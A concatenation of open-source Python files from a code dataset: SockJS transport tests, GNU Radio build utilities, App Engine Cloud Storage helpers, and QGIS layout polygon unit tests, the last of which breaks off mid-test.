    print "%-40s  %10s\n" % ("----------------------------------------", \
        "-----------"),

    for event_name in keys:
        print "%-40s  %10d\n" % (event_name, unhandled[event_name])
| gpl-2.0 |
sprymix/sockjs | tests/test_transport.py | 2 | 2362 | from unittest import mock
from aiohttp import web
from test_base import TestCase
from sockjs import protocol
from sockjs.transports import base
class TransportTestCase(TestCase):
    """Unit tests for the base SockJS transport classes."""

    # Transport implementation instantiated by make_transport().
    TRANSPORT_CLASS = base.StreamingTransport

    def test_transport_ctor(self):
        """Constructor stores manager/session/request and picks up the loop."""
        manager = object()
        session = object()
        request = self.make_request('GET', '/')

        transport = base.Transport(manager, session, request)
        self.assertIs(transport.manager, manager)
        self.assertIs(transport.session, session)
        self.assertIs(transport.request, request)
        self.assertIs(transport.loop, self.loop)

    def test_streaming_send(self):
        """send() frames the text, tracks size, and signals stop at maxsize."""
        trans = self.make_transport()

        resp = trans.response = mock.Mock()
        stop = trans.send('text data')
        self.assertFalse(stop)
        self.assertEqual(trans.size, len(b'text data\n'))
        resp.write.assert_called_with(b'text data\n')

        # Once accumulated size passes maxsize, send() asks the caller to stop.
        trans.maxsize = 1
        stop = trans.send('text data')
        self.assertTrue(stop)

    def test_handle_session_interrupted(self):
        """An interrupted session produces a 1002 close frame."""
        trans = self.make_transport()
        trans.session.interrupted = True
        trans.send = self.make_fut(1)
        trans.response = web.StreamResponse()
        self.loop.run_until_complete(trans.handle_session())
        trans.send.assert_called_with('c[1002,"Connection interrupted"]')

    def test_handle_session_closing(self):
        """A closing session notifies the session and sends a 3000 frame."""
        trans = self.make_transport()
        trans.send = self.make_fut(1)
        trans.session.interrupted = False
        trans.session.state = protocol.STATE_CLOSING
        trans.session._remote_closed = self.make_fut(1)
        trans.response = web.StreamResponse()
        self.loop.run_until_complete(trans.handle_session())
        trans.session._remote_closed.assert_called_with()
        trans.send.assert_called_with('c[3000,"Go away!"]')

    def test_handle_session_closed(self):
        """An already-closed session behaves the same as a closing one."""
        trans = self.make_transport()
        trans.send = self.make_fut(1)
        trans.session.interrupted = False
        trans.session.state = protocol.STATE_CLOSED
        trans.session._remote_closed = self.make_fut(1)
        trans.response = web.StreamResponse()
        self.loop.run_until_complete(trans.handle_session())
        trans.session._remote_closed.assert_called_with()
        trans.send.assert_called_with('c[3000,"Go away!"]')
| apache-2.0 |
tta/gnuradio-tta | gnuradio-core/src/python/build_utils.py | 11 | 5901 | #
# Copyright 2004,2009 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
"""Misc utilities used at build time
"""
import re, os, os.path
from build_utils_codes import *
# set srcdir to the directory that contains Makefile.am
try:
    srcdir = os.environ['srcdir']
except KeyError, e:
    srcdir = "."
srcdir = srcdir + '/'

# set do_makefile to either true or false depending on the environment
# (defaults to False when the variable is unset)
try:
    if os.environ['do_makefile'] == '0':
        do_makefile = False
    else:
        do_makefile = True
except KeyError, e:
    do_makefile = False

# set do_sources to either true or false depending on the environment
# (note: unlike do_makefile, do_sources defaults to True when unset)
try:
    if os.environ['do_sources'] == '0':
        do_sources = False
    else:
        do_sources = True
except KeyError, e:
    do_sources = True

# registry of generated output files, keyed by extension ('h', 'i', 'cc')
name_dict = {}
def log_output_name(name):
    """Record generated file *name* in the global registry, keyed by extension."""
    ext = os.path.splitext(name)[1][1:]  # extension without the leading '.'
    name_dict.setdefault(ext, []).append(name)
def open_and_log_name (name, dir):
    """Open *name* for writing (when do_sources is set) and register it.

    Returns the open file object, or None when source generation is
    disabled (the name is still logged either way).

    NOTE(review): despite its name, the 'dir' parameter is passed to
    open() as the mode argument (e.g. 'w') -- confirm with callers
    before renaming it.
    """
    global do_sources
    if do_sources:
        f = open (name, dir)
    else:
        f = None
    log_output_name (name)
    return f
def expand_template (d, template_filename, extra = ""):
    '''Given a dictionary D and a TEMPLATE_FILENAME, expand template into output file
    '''
    global do_sources
    # Output keeps the template's penultimate extension: foo.h.t -> <NAME>.h
    output_extension = extract_extension (template_filename)
    template = open_src (template_filename, 'r')
    output_name = d['NAME'] + extra + '.' + output_extension
    log_output_name (output_name)
    if do_sources:
        output = open (output_name, 'w')
        do_substitution (d, template, output)
        output.close ()
    template.close ()
def output_glue (dirname):
    """Emit the Makefile fragment and the SWIG include file for *dirname*."""
    output_makefile_fragment ()
    output_ifile_include (dirname)
def output_makefile_fragment ():
    """Write Makefile.gen listing all generated .h/.i/.cc files."""
    global do_makefile
    if not do_makefile:
        return

    # overwrite the source, which must be writable; this should have been
    # checked for beforehand in the top-level Makefile.gen.gen .
    f = open_src ('Makefile.gen', 'w')
    f.write ('#\n# This file is machine generated. All edits will be overwritten\n#\n')
    output_subfrag (f, 'h')
    output_subfrag (f, 'i')
    output_subfrag (f, 'cc')
    f.close ()
def output_ifile_include (dirname):
    """Write <dirname>_generated.i, a SWIG file covering every generated .i."""
    global do_sources
    if do_sources:
        f = open ('%s_generated.i' % (dirname,), 'w')
        f.write ('//\n// This file is machine generated. All edits will be overwritten\n//\n')

        files = name_dict.setdefault ('i', [])
        files.sort ()
        f.write ('%{\n')
        for file in files:
            # Include the matching C++ header: 'foo.i' -> 'foo.h'.
            f.write ('#include <%s>\n' % (file[0:-1] + 'h',))
        f.write ('%}\n\n')

        for file in files:
            f.write ('%%include <%s>\n' % (file,))
def output_subfrag (f, ext):
    """Append a GENERATED_<EXT> make variable listing files with *ext* to *f*.

    Note: files.sort() deliberately sorts the registry list in place, so
    later users of name_dict[ext] see it sorted too.
    """
    files = name_dict.setdefault (ext, [])
    files.sort ()
    f.write ("GENERATED_%s =" % (ext.upper ()))
    for file in files:
        f.write (" \\\n\t%s" % (file,))
    f.write ("\n\n")
def extract_extension(template_name):
    """Return the output extension embedded in a template file name.

    Template names look like ``GrFIRfilterXXX.h.t``; the extension is
    whatever sits between the penultimate ``.`` and the trailing ``.t``.

    Raises:
        ValueError: if *template_name* does not end in ``.<ext>.t``.
    """
    mo = re.search(r'\.([a-z]+)\.t$', template_name)
    if not mo:
        # Parenthesized raise is valid in both Python 2 and 3, unlike the
        # old ``raise ValueError, msg`` statement form used previously.
        raise ValueError("Incorrectly formed template_name '%s'" % (template_name,))
    return mo.group(1)
def open_src (name, mode):
    """Open *name* relative to the srcdir captured from the environment."""
    global srcdir
    return open (os.path.join (srcdir, name), mode)
def do_substitution(d, in_file, out_file):
    """Expand ``@KEY@`` placeholders in *in_file* using dictionary *d*.

    The fully substituted text is written to *out_file*; a missing key
    raises KeyError, matching dict lookup semantics.
    """
    text = in_file.read()
    expanded = re.sub(r"@([a-zA-Z0-9_]+)@",
                      lambda match: d[match.group(1)],
                      text)
    out_file.write(expanded)
copyright = '''/* -*- c++ -*- */
/*
* Copyright 2003,2004 Free Software Foundation, Inc.
*
* This file is part of GNU Radio
*
* GNU Radio is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 3, or (at your option)
* any later version.
*
* GNU Radio is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with GNU Radio; see the file COPYING. If not, write to
* the Free Software Foundation, Inc., 51 Franklin Street,
* Boston, MA 02110-1301, USA.
*/
'''
def is_complex(code3):
    """Return '1' when either the input or output type code is complex, else '0'.

    The result is a string because it is substituted directly into templates.
    """
    return '1' if 'c' in (i_code(code3), o_code(code3)) else '0'
def standard_dict (name, code3):
    """Build the standard substitution dictionary for a block named *name*.

    *code3* is the three-letter type code (e.g. 'ccf'); the i_/o_/tap_
    type helpers come from build_utils_codes.
    """
    d = {}
    d['NAME'] = name
    d['GUARD_NAME'] = 'INCLUDED_%s_H' % name.upper ()
    # e.g. 'gr_fir_ccf' -> 'fir_ccf'
    d['BASE_NAME'] = re.sub ('^gr_', '', name)
    d['SPTR_NAME'] = '%s_sptr' % name
    d['WARNING'] = 'WARNING: this file is machine generated. Edits will be over written'
    d['COPYRIGHT'] = copyright
    d['TYPE'] = i_type (code3)
    d['I_TYPE'] = i_type (code3)
    d['O_TYPE'] = o_type (code3)
    d['TAP_TYPE'] = tap_type (code3)
    d['IS_COMPLEX'] = is_complex (code3)
    return d
| gpl-3.0 |
soundofjw/appengine-mapreduce | python/test/mapreduce gcs/cloudstorage/common.py | 129 | 12326 | # Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Helpers shared by cloudstorage_stub and cloudstorage_api."""
__all__ = ['CS_XML_NS',
'CSFileStat',
'dt_str_to_posix',
'local_api_url',
'LOCAL_GCS_ENDPOINT',
'local_run',
'get_access_token',
'get_stored_content_length',
'get_metadata',
'GCSFileStat',
'http_time_to_posix',
'memory_usage',
'posix_time_to_http',
'posix_to_dt_str',
'set_access_token',
'validate_options',
'validate_bucket_name',
'validate_bucket_path',
'validate_file_path',
]
import calendar
import datetime
from email import utils as email_utils
import logging
import os
import re
try:
from google.appengine.api import runtime
except ImportError:
from google.appengine.api import runtime
# Bucket names: 3-63 chars drawn from lowercase letters, digits, '.', '-', '_'.
_GCS_BUCKET_REGEX_BASE = r'[a-z0-9\.\-_]{3,63}'
_GCS_BUCKET_REGEX = re.compile(_GCS_BUCKET_REGEX_BASE + r'$')
_GCS_BUCKET_PATH_REGEX = re.compile(r'/' + _GCS_BUCKET_REGEX_BASE + r'$')
_GCS_PATH_PREFIX_REGEX = re.compile(r'/' + _GCS_BUCKET_REGEX_BASE + r'.*')
_GCS_FULLPATH_REGEX = re.compile(r'/' + _GCS_BUCKET_REGEX_BASE + r'/.*')
# User-settable metadata header names/prefixes; options additionally allow ACLs.
_GCS_METADATA = ['x-goog-meta-',
                 'content-disposition',
                 'cache-control',
                 'content-encoding']
_GCS_OPTIONS = _GCS_METADATA + ['x-goog-acl']
CS_XML_NS = 'http://doc.s3.amazonaws.com/2006-03-01'
# Dev-appserver endpoint emulating GCS locally.
LOCAL_GCS_ENDPOINT = '/_ah/gcs'
# Shared bearer token; empty string means "use automatic auth / local stub".
_access_token = ''
_MAX_GET_BUCKET_RESULT = 1000
def set_access_token(access_token):
    """Set the shared access token to authenticate with Google Cloud Storage.

    When set, the library will always attempt to communicate with the
    real Google Cloud Storage with this token even when running on dev appserver.
    Note the token could expire so it's up to you to renew it.

    When absent, the library will automatically request and refresh a token
    on appserver, or when on dev appserver, talk to a Google Cloud Storage
    stub.

    Args:
        access_token: you can get one by run 'gsutil -d ls' and copy the
            str after 'Bearer'.
    """
    # Stored module-globally; shared by every caller in this process.
    global _access_token
    _access_token = access_token
def get_access_token():
    """Returns the shared access token (empty string when unset)."""
    return _access_token
class GCSFileStat(object):
    """Container for GCS file stat."""

    def __init__(self,
                 filename,
                 st_size,
                 etag,
                 st_ctime,
                 content_type=None,
                 metadata=None,
                 is_dir=False):
        """Initialize.

        For files, the non optional arguments are always set.
        For directories, only filename and is_dir is set.

        Args:
            filename: a Google Cloud Storage filename of form '/bucket/filename'.
            st_size: file size in bytes. long compatible.
            etag: hex digest of the md5 hash of the file's content. str.
            st_ctime: posix file creation time. float compatible.
            content_type: content type. str.
            metadata: a str->str dict of user specified options when creating
                the file. Possible keys are x-goog-meta-, content-disposition,
                content-encoding, and cache-control.
            is_dir: True if this represents a directory. False if this is a real file.
        """
        self.filename = filename
        self.is_dir = is_dir
        self.st_size = None
        self.st_ctime = None
        self.etag = None
        self.content_type = content_type
        self.metadata = metadata

        if not is_dir:
            # long() is Python-2 only; this module targets Python 2.
            self.st_size = long(st_size)
            self.st_ctime = float(st_ctime)
            # GCS returns the etag wrapped in double quotes; strip them.
            if etag[0] == '"' and etag[-1] == '"':
                etag = etag[1:-1]
            self.etag = etag

    def __repr__(self):
        if self.is_dir:
            return '(directory: %s)' % self.filename

        return (
            '(filename: %(filename)s, st_size: %(st_size)s, '
            'st_ctime: %(st_ctime)s, etag: %(etag)s, '
            'content_type: %(content_type)s, '
            'metadata: %(metadata)s)' %
            dict(filename=self.filename,
                 st_size=self.st_size,
                 st_ctime=self.st_ctime,
                 etag=self.etag,
                 content_type=self.content_type,
                 metadata=self.metadata))

    def __cmp__(self, other):
        # __cmp__ is honoured by Python 2 only; ordering is by filename.
        # NOTE(review): the ValueError below passes %-style placeholders as
        # extra arguments instead of formatting them -- the message is never
        # interpolated.  Preserved as-is.
        if not isinstance(other, self.__class__):
            raise ValueError('Argument to cmp must have the same type. '
                             'Expect %s, got %s', self.__class__.__name__,
                             other.__class__.__name__)
        if self.filename > other.filename:
            return 1
        elif self.filename < other.filename:
            return -1
        return 0

    def __hash__(self):
        # Hash by content (etag) when available, otherwise by name.
        if self.etag:
            return hash(self.etag)
        return hash(self.filename)
CSFileStat = GCSFileStat
def get_stored_content_length(headers):
    """Return the content length (in bytes) of the object as stored in GCS.

    Real GCS responses always carry x-goog-stored-content-length; the local
    dev_appserver does not, in which case the standard content-length
    header is used as a fallback.

    Args:
        headers: a dict of headers from the http response.

    Returns:
        the stored content length.
    """
    stored = headers.get('x-goog-stored-content-length')
    if stored is not None:
        return stored
    return headers.get('content-length')
def get_metadata(headers):
    """Get user defined options from HTTP response headers.

    Args:
        headers: a dict of response headers.

    Returns:
        A dict with only the entries whose (case-insensitive) names start
        with one of the user-metadata prefixes in _GCS_METADATA.
    """
    # dict.iteritems() is Python-2 only; items() behaves identically here
    # and keeps this helper working under Python 3 as well.
    return dict((k, v) for k, v in headers.items()
                if any(k.lower().startswith(valid) for valid in _GCS_METADATA))
def validate_bucket_name(name):
    """Validate a Google Storage bucket name.

    Args:
        name: a Google Storage bucket name with no prefix or suffix.

    Raises:
        ValueError: if name is invalid.
    """
    # Also raises TypeError/ValueError for empty or non-string input.
    _validate_path(name)
    if not _GCS_BUCKET_REGEX.match(name):
        raise ValueError('Bucket should be 3-63 characters long using only a-z,'
                         '0-9, underscore, dash or dot but got %s' % name)
def validate_bucket_path(path):
    """Validate a Google Cloud Storage bucket path.

    Args:
        path: a Google Storage bucket path. It should have form '/bucket'.

    Raises:
        ValueError: if path is invalid.
    """
    _validate_path(path)
    if not _GCS_BUCKET_PATH_REGEX.match(path):
        raise ValueError('Bucket should have format /bucket '
                         'but got %s' % path)
def validate_file_path(path):
    """Validate a Google Cloud Storage file path.

    Args:
        path: a Google Storage file path. It should have form '/bucket/filename'.

    Raises:
        ValueError: if path is invalid.
    """
    _validate_path(path)
    if not _GCS_FULLPATH_REGEX.match(path):
        raise ValueError('Path should have format /bucket/filename '
                         'but got %s' % path)
def _process_path_prefix(path_prefix):
    """Validate and process a Google Cloud Storage path prefix.

    Args:
        path_prefix: a Google Cloud Storage path prefix of format '/bucket/prefix'
            or '/bucket/' or '/bucket'.

    Raises:
        ValueError: if path is invalid.

    Returns:
        a tuple of /bucket and prefix. prefix can be None.
    """
    _validate_path(path_prefix)
    if not _GCS_PATH_PREFIX_REGEX.match(path_prefix):
        raise ValueError('Path prefix should have format /bucket, /bucket/, '
                         'or /bucket/prefix but got %s.' % path_prefix)
    # Split '/bucket/prefix' at the second '/'.  An empty prefix
    # ('/bucket/') collapses to None via the `or None`.
    bucket_name_end = path_prefix.find('/', 1)
    bucket = path_prefix
    prefix = None
    if bucket_name_end != -1:
        bucket = path_prefix[:bucket_name_end]
        prefix = path_prefix[bucket_name_end + 1:] or None
    return bucket, prefix
def _validate_path(path):
    """Basic validation of Google Storage paths.

    Args:
        path: a Google Storage path. It should have form '/bucket/filename'
            or '/bucket'.

    Raises:
        ValueError: if path is invalid.
        TypeError: if path is not of type basestring.
    """
    if not path:
        raise ValueError('Path is empty')
    # basestring is Python-2 only (covers both str and unicode).
    if not isinstance(path, basestring):
        raise TypeError('Path should be a string but is %s (%s).' %
                        (path.__class__, path))
def validate_options(options):
    """Validate Google Cloud Storage options.

    Args:
        options: a str->basestring dict of options to pass to Google Cloud Storage.

    Raises:
        ValueError: if option is not supported.
        TypeError: if option is not of type str or value of an option
            is not of type basestring.
    """
    if not options:
        return

    # iteritems()/basestring are Python-2 only; this module targets Python 2.
    for k, v in options.iteritems():
        if not isinstance(k, str):
            raise TypeError('option %r should be a str.' % k)
        if not any(k.lower().startswith(valid) for valid in _GCS_OPTIONS):
            raise ValueError('option %s is not supported.' % k)
        if not isinstance(v, basestring):
            raise TypeError('value %r for option %s should be of type basestring.' %
                            (v, k))
def http_time_to_posix(http_time):
    """Convert an RFC 2616 HTTP date string to posix time.

    See http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.3.1
    for the HTTP time format.

    Args:
        http_time: time in RFC 2616 format, e.g. "Mon, 20 Nov 1995 19:12:08 GMT".

    Returns:
        A float of secs from unix epoch, or None when *http_time* is None.
    """
    if http_time is None:
        return None
    return email_utils.mktime_tz(email_utils.parsedate_tz(http_time))
def posix_time_to_http(posix_time):
    """Format unix time as an RFC 2616 (HTTP header) date string.

    Args:
        posix_time: unix time.

    Returns:
        A datetime str in RFC 2616 format, or None for falsy input.
    """
    if not posix_time:
        return None
    return email_utils.formatdate(posix_time, usegmt=True)
# Seconds-resolution part of the ISO-8601 timestamps GCS uses.
_DT_FORMAT = '%Y-%m-%dT%H:%M:%S'


def dt_str_to_posix(dt_str):
    """Convert a GCS LastModified timestamp string to posix seconds.

    Timestamps look like 2013-04-12T00:22:27.978Z (ISO 8601; T separates
    date and time, Z means UTC).  The fractional part after the single
    '.' is discarded.  Used when parsing GCS GET-bucket XML responses.

    Args:
        dt_str: A datetime str.

    Returns:
        A float of secs from unix epoch (midnight 1970/1/1 UTC).
    """
    seconds_part, _fraction = dt_str.split('.')
    parsed = datetime.datetime.strptime(seconds_part, _DT_FORMAT)
    return calendar.timegm(parsed.utctimetuple())


def posix_to_dt_str(posix):
    """Reverse of dt_str_to_posix; used by the GCS stub to build XML responses.

    Args:
        posix: A float of secs from unix epoch.

    Returns:
        A datetime str with a fixed '.000Z' fractional suffix.
    """
    as_utc = datetime.datetime.utcfromtimestamp(posix)
    return as_utc.strftime(_DT_FORMAT) + '.000Z'
def local_run():
    """Whether we should hit the GCS dev-appserver stub.

    True when no SERVER_SOFTWARE is set or when running under the dev
    appserver / test harness; False on production or via remote_api.
    """
    server_software = os.environ.get('SERVER_SOFTWARE')
    if server_software is None:
        return True
    if 'remote_api' in server_software:
        return False
    return server_software.startswith(('Development', 'testutil'))
def local_api_url():
    """Return URL for GCS emulation on dev appserver."""
    # HTTP_HOST is set per-request by the dev appserver.
    return 'http://%s%s' % (os.environ.get('HTTP_HOST'), LOCAL_GCS_ENDPOINT)
def memory_usage(method):
    """Decorator that logs runtime memory usage before and after *method*.

    Args:
        method: the callable to wrap.

    Returns:
        A wrapper with the same behaviour (and, via functools.wraps, the
        same __name__/__doc__) as *method*.
    """
    import functools

    # Without wraps() the decorated function would be reported as
    # 'wrapper' in logs, tracebacks and introspection.
    @functools.wraps(method)
    def wrapper(*args, **kwargs):
        logging.info('Memory before method %s is %s.',
                     method.__name__, runtime.memory_usage().current())
        result = method(*args, **kwargs)
        logging.info('Memory after method %s is %s',
                     method.__name__, runtime.memory_usage().current())
        return result
    return wrapper
def _add_ns(tagname):
    """Qualify *tagname* with the S3/GCS XML namespace ('{ns}tag' form)."""
    return '{%(ns)s}%(tag)s' % {'ns': CS_XML_NS,
                                'tag': tagname}


# Pre-qualified tag names used when parsing GET-bucket XML responses.
_T_CONTENTS = _add_ns('Contents')
_T_LAST_MODIFIED = _add_ns('LastModified')
_T_ETAG = _add_ns('ETag')
_T_KEY = _add_ns('Key')
_T_SIZE = _add_ns('Size')
_T_PREFIX = _add_ns('Prefix')
_T_COMMON_PREFIXES = _add_ns('CommonPrefixes')
_T_NEXT_MARKER = _add_ns('NextMarker')
_T_IS_TRUNCATED = _add_ns('IsTruncated')
| apache-2.0 |
borysiasty/QGIS | tests/src/python/test_qgslayoutpolygon.py | 26 | 12819 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsLayoutItemPolygon.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = '(C) 2016 by Paul Blottiere'
__date__ = '14/03/2016'
__copyright__ = 'Copyright 2016, The QGIS Project'
import qgis # NOQA
from qgis.PyQt.QtGui import QPolygonF, QPainter, QImage
from qgis.PyQt.QtCore import QPointF, QRectF
from qgis.PyQt.QtXml import QDomDocument
from qgis.PyQt.QtTest import QSignalSpy
from qgis.core import (QgsLayoutItemPolygon,
QgsLayoutItemRegistry,
QgsLayout,
QgsFillSymbol,
QgsProject,
QgsReadWriteContext,
QgsLayoutItem,
QgsLayoutItemRenderContext,
QgsLayoutUtils)
from qgis.testing import (start_app,
unittest
)
from utilities import unitTestDataPath
from qgslayoutchecker import QgsLayoutChecker
from test_qgslayoutitem import LayoutItemTestCase
start_app()
TEST_DATA_DIR = unitTestDataPath()
class TestQgsLayoutPolygon(unittest.TestCase, LayoutItemTestCase):
    """Unit tests for QgsLayoutItemPolygon node editing, styling and XML I/O."""

    @classmethod
    def setUpClass(cls):
        # Item class exercised by the generic LayoutItemTestCase checks.
        cls.item_class = QgsLayoutItemPolygon

    def __init__(self, methodName):
        """Run once on class initialization."""
        unittest.TestCase.__init__(self, methodName)

        # create composition
        self.layout = QgsLayout(QgsProject.instance())
        self.layout.initializeDefaults()

        # create a polygon item shared by the rendering tests below
        polygon = QPolygonF()
        polygon.append(QPointF(0.0, 0.0))
        polygon.append(QPointF(100.0, 0.0))
        polygon.append(QPointF(200.0, 100.0))
        polygon.append(QPointF(100.0, 200.0))

        self.polygon = QgsLayoutItemPolygon(polygon, self.layout)
        self.layout.addLayoutItem(self.polygon)

        # style
        props = {}
        props["color"] = "green"
        props["style"] = "solid"
        props["style_border"] = "solid"
        props["color_border"] = "black"
        props["width_border"] = "10.0"
        props["joinstyle"] = "miter"

        style = QgsFillSymbol.createSimple(props)
        self.polygon.setSymbol(style)

    def testNodes(self):
        """Nodes given to the constructor and via setNodes() round-trip."""
        polygon = QPolygonF()
        polygon.append(QPointF(0.0, 0.0))
        polygon.append(QPointF(100.0, 0.0))
        polygon.append(QPointF(200.0, 100.0))
        polygon.append(QPointF(100.0, 200.0))

        p = QgsLayoutItemPolygon(polygon, self.layout)
        self.assertEqual(p.nodes(), polygon)

        polygon = QPolygonF()
        polygon.append(QPointF(0.0, 0.0))
        polygon.append(QPointF(1000.0, 0.0))
        polygon.append(QPointF(2000.0, 100.0))
        polygon.append(QPointF(1000.0, 200.0))

        p.setNodes(polygon)
        self.assertEqual(p.nodes(), polygon)

    def testDisplayName(self):
        """Test if displayName is valid"""
        self.assertEqual(self.polygon.displayName(), "<Polygon>")

    def testType(self):
        """Test if type is valid"""
        self.assertEqual(
            self.polygon.type(), QgsLayoutItemRegistry.LayoutPolygon)

    def testDefaultStyle(self):
        """Test polygon rendering with default style."""
        self.polygon.setDisplayNodes(False)
        checker = QgsLayoutChecker(
            'composerpolygon_defaultstyle', self.layout)
        checker.setControlPathPrefix("composer_polygon")
        myTestResult, myMessage = checker.testLayout()
        assert myTestResult, myMessage

    def testDisplayNodes(self):
        """Test displayNodes method"""
        self.polygon.setDisplayNodes(True)
        checker = QgsLayoutChecker(
            'composerpolygon_displaynodes', self.layout)
        checker.setControlPathPrefix("composer_polygon")
        myTestResult, myMessage = checker.testLayout()
        assert myTestResult, myMessage

        # turning node display back off must restore the default rendering
        self.polygon.setDisplayNodes(False)
        checker = QgsLayoutChecker(
            'composerpolygon_defaultstyle', self.layout)
        checker.setControlPathPrefix("composer_polygon")
        myTestResult, myMessage = checker.testLayout()
        assert myTestResult, myMessage

    def testSelectedNode(self):
        """Test selectedNode and deselectNode methods"""
        self.polygon.setDisplayNodes(True)

        self.polygon.setSelectedNode(3)
        checker = QgsLayoutChecker(
            'composerpolygon_selectednode', self.layout)
        checker.setControlPathPrefix("composer_polygon")
        myTestResult, myMessage = checker.testLayout()
        assert myTestResult, myMessage

        # deselecting must restore the default rendering
        self.polygon.deselectNode()
        self.polygon.setDisplayNodes(False)
        checker = QgsLayoutChecker(
            'composerpolygon_defaultstyle', self.layout)
        checker.setControlPathPrefix("composer_polygon")
        myTestResult, myMessage = checker.testLayout()
        assert myTestResult, myMessage

    def testRemoveNode(self):
        """Test removeNode method"""
        # out-of-range index is rejected and leaves the shape untouched
        rc = self.polygon.removeNode(100)
        self.assertEqual(rc, False)
        checker = QgsLayoutChecker(
            'composerpolygon_defaultstyle', self.layout)
        checker.setControlPathPrefix("composer_polygon")
        myTestResult, myMessage = checker.testLayout()
        assert myTestResult, myMessage
        self.assertEqual(self.polygon.nodesSize(), 4)

    def testAddNode(self):
        """Test addNode method"""
        # default searching radius is 10: a point 10 units from the edge fails
        self.assertEqual(self.polygon.nodesSize(), 4)
        rc = self.polygon.addNode(QPointF(50.0, 10.0))
        self.assertEqual(rc, False)

        # just inside the default radius of 10 succeeds
        self.assertEqual(self.polygon.nodesSize(), 4)
        rc = self.polygon.addNode(QPointF(50.0, 9.99))
        self.assertEqual(rc, True)
        self.assertEqual(self.polygon.nodesSize(), 5)

    def testAddNodeCustomRadius(self):
        """Test addNode with custom radius"""
        self.assertEqual(self.polygon.nodesSize(), 4)
        # point just outside the custom radius of 8 is rejected
        rc = self.polygon.addNode(QPointF(50.0, 8.1), True, 8.0)
        self.assertEqual(rc, False)
        self.assertEqual(self.polygon.nodesSize(), 4)

        # point just inside the custom radius of 8 is accepted
        rc = self.polygon.addNode(QPointF(50.0, 7.9), True, 8.0)
        self.assertEqual(rc, True)
        self.assertEqual(self.polygon.nodesSize(), 5)

    def testAddNodeWithoutCheckingArea(self):
        """Test addNode without checking the maximum distance allowed"""
        # default searching radius is 10: 20 units away is rejected
        self.assertEqual(self.polygon.nodesSize(), 4)
        rc = self.polygon.addNode(QPointF(50.0, 20.0))
        self.assertEqual(rc, False)
        self.assertEqual(self.polygon.nodesSize(), 4)

        # with checkArea=False the distance check is skipped entirely
        self.assertEqual(self.polygon.nodesSize(), 4)
        rc = self.polygon.addNode(QPointF(50.0, 20.0), False)
        self.assertEqual(rc, True)
        self.assertEqual(self.polygon.nodesSize(), 5)

        checker = QgsLayoutChecker(
            'composerpolygon_addnode', self.layout)
        checker.setControlPathPrefix("composer_polygon")
        myTestResult, myMessage = checker.testLayout()
        assert myTestResult, myMessage

    def testMoveNode(self):
        """Test moveNode method"""
        # out-of-range index is rejected
        rc = self.polygon.moveNode(30, QPointF(100.0, 300.0))
        self.assertEqual(rc, False)

        rc = self.polygon.moveNode(3, QPointF(100.0, 150.0))
        self.assertEqual(rc, True)
        checker = QgsLayoutChecker(
            'composerpolygon_movenode', self.layout)
        checker.setControlPathPrefix("composer_polygon")
        myTestResult, myMessage = checker.testLayout()
        assert myTestResult, myMessage

    def testNodeAtPosition(self):
        """Test nodeAtPosition method"""
        p = QPolygonF()
        p.append(QPointF(0.0, 0.0))
        p.append(QPointF(100.0, 0.0))
        p.append(QPointF(200.0, 100.0))
        p.append(QPointF(100.0, 200.0))

        polygon = QgsLayoutItemPolygon(p, self.layout)

        # default searching radius is 10: node is 10 units away, not found
        rc = polygon.nodeAtPosition(QPointF(100.0, 210.0))
        self.assertEqual(rc, -1)

        # with searchInRadius=False the nearest node is returned regardless
        rc = polygon.nodeAtPosition(
            QPointF(100.0, 210.0), False)
        self.assertEqual(rc, 3)

        # an enlarged radius of 10.1 captures the node 10 units away
        rc = polygon.nodeAtPosition(
            QPointF(100.0, 210.0), True, 10.1)
        self.assertEqual(rc, 3)

    def testReadWriteXml(self):
        """Nodes and symbol must survive a writeXml/readXml round trip."""
        pr = QgsProject()
        l = QgsLayout(pr)

        p = QPolygonF()
        p.append(QPointF(0.0, 0.0))
        p.append(QPointF(100.0, 0.0))
        p.append(QPointF(200.0, 100.0))
        shape = QgsLayoutItemPolygon(p, l)

        props = {}
        props["color"] = "green"
        props["style"] = "solid"
        props["style_border"] = "solid"
        props["color_border"] = "red"
        props["width_border"] = "10.0"
        props["joinstyle"] = "miter"

        style = QgsFillSymbol.createSimple(props)
        shape.setSymbol(style)

        # save original item to xml
        doc = QDomDocument("testdoc")
        elem = doc.createElement("test")
        self.assertTrue(shape.writeXml(elem, doc, QgsReadWriteContext()))

        shape2 = QgsLayoutItemPolygon(l)
        self.assertTrue(shape2.readXml(elem.firstChildElement(), doc, QgsReadWriteContext()))

        self.assertEqual(shape2.nodes(), shape.nodes())
        # green fill, red stroke as hex strings
        self.assertEqual(shape2.symbol().symbolLayer(0).color().name(), '#008000')
        self.assertEqual(shape2.symbol().symbolLayer(0).strokeColor().name(), '#ff0000')

    def testBounds(self):
        """Bounding rects must account for the symbol's stroke width."""
        pr = QgsProject()
        l = QgsLayout(pr)

        p = QPolygonF()
        p.append(QPointF(50.0, 30.0))
        p.append(QPointF(100.0, 10.0))
        p.append(QPointF(200.0, 100.0))
